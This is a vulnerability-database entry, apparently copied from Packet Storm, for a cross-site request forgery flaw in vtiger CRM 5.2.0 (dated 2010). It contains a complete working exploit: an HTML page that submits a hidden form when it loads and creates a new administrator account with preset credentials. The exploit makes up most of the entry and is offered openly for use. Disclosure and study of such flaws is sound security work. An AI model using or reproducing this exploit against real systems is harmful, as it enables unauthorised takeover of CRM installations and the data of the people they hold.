ID
VAR-E-201005-1525
TITLE
vtiger CRM 5.2.0 Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
vtiger CRM version 5.2.0 cross site request forgery exploit.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | vtiger | model: | crm | scope: | eq | version: | 5.2.0 | Trust: 0.5 |
EXPLOIT
<!--=========================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Cross-site Request Forgery #
# Software.................vtiger CRM 5.2.0 #
# Download.................http://sourceforge.net/projects/vtigercrm/files/ #
# Date.....................5/21/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A cross-site request forgery vunlerability in vtiger CRM 5.2.0 can be exploited to create an new admin. #
# The form values can also be sent via GET request, but the resulting user does not have admin privileges. #
# #
# #
# ##Proof of Concept## -->
<html>
<body onload="document.forms[0].submit()">
<form name="EditView" method="post" action="http://localhost/index.php">
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="user_name" value="new_user" />
<input type="hidden" name="is_admin" value="on" />
<input type="hidden" name="user_password" value="new_password" />
<input type="hidden" name="confirm_password" value="new_password" />
<input type="hidden" name="email1" value="test@test.com" />
<input type="hidden" name="status" value="Active" />
</form>
</body>
</html>
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
csrf
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
AutoSec Tools
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 89822 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 89822 |
LAST UPDATE DATE
2022-07-27T09:59:19.699000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 89822 | date: | 2010-05-22T19:02:37 |